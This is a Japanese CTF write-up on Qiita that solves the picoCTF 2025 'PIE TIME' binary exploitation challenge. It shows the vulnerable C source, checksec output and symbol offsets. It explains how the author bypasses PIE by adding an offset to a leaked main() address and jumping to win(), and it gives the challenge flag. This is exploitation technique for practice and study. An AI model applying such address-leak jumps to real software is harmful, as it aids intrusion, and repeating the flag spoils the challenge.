LoginSignup
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

@colza_

picoCTF 2025 writeup PIE TIME

Last updated at Posted at 2025-04-22

PIE TIME (Binary Exploitation)

Can you try to get the flag? Beware we have PIE! Connect to the program with netcat:

$ nc rescued-float.picoctf.net 56039

The program's source code can be downloaded here. The binary can be downloaded here.

添付ファイル
・vuln.c
・vuln

とりあえず、実行してみる。

$ nc rescued-float.picoctf.net 56039
Address of main: 0x5b040547233d
Enter the address to jump to, ex => 0x12345: 0x5b040547233d
Your input: 5b040547233d
Address of main: 0x5b040547233d
Enter the address to jump to, ex => 0x12345:

任意のアドレスにjumpできるらしい。
ソースコードを確認する。

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void segfault_handler() {
  printf("Segfault Occurred, incorrect address.\n");
  exit(0);
}

int win() {
  FILE *fptr;
  char c;

  printf("You won!\n");
  // Open file
  fptr = fopen("flag.txt", "r");
  if (fptr == NULL)
  {
      printf("Cannot open file.\n");
      exit(0);
  }

  // Read contents from file
  c = fgetc(fptr);
  while (c != EOF)
  {
      printf ("%c", c);
      c = fgetc(fptr);
  }

  printf("\n");
  fclose(fptr);
}

int main() {
  signal(SIGSEGV, segfault_handler);
  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered

  printf("Address of main: %p\n", &main);

  unsigned long val;
  printf("Enter the address to jump to, ex => 0x12345: ");
  scanf("%lx", &val);
  printf("Your input: %lx\n", val);

  void (*foo)(void) = (void (*)())val;
  foo();

win()があるのが分かるので、win()のアドレスを入力すれば、フラグが得られる。

$ checksec vuln
[*] '/home/colza-picoctf/vuln'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

PIEが有効になっているので、main()とwin()のアドレスの差分を計算しておく。

66: 00000000000012a7   150 FUNC    GLOBAL DEFAULT   16 win
67: 0000000000004020     0 NOTYPE  GLOBAL DEFAULT   26 _end
68: 00000000000011a0    47 FUNC    GLOBAL DEFAULT   16 _start
69: 0000000000004010     0 NOTYPE  GLOBAL DEFAULT   26 __bss_start
70: 000000000000133d   204 FUNC    GLOBAL DEFAULT   16 main

差分は、0x12a7 - 0x133d = -0x96である。
実行時に出力されるmain関数のあどれsに-0x96を加算したものを入力する。

$ nc rescued-float.picoctf.net 56039
Address of main: 0x628f1fcd933d
Enter the address to jump to, ex => 0x12345: 0x628f1fcd92a7
Your input: 628f1fcd92a7
You won!
picoCTF{b4s1c_p051t10n_1nd3p3nd3nc3_ecb96bdd}

フラグが得られた。

picoCTF{b4s1c_p051t10n_1nd3p3nd3nc3_ecb96bdd}

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?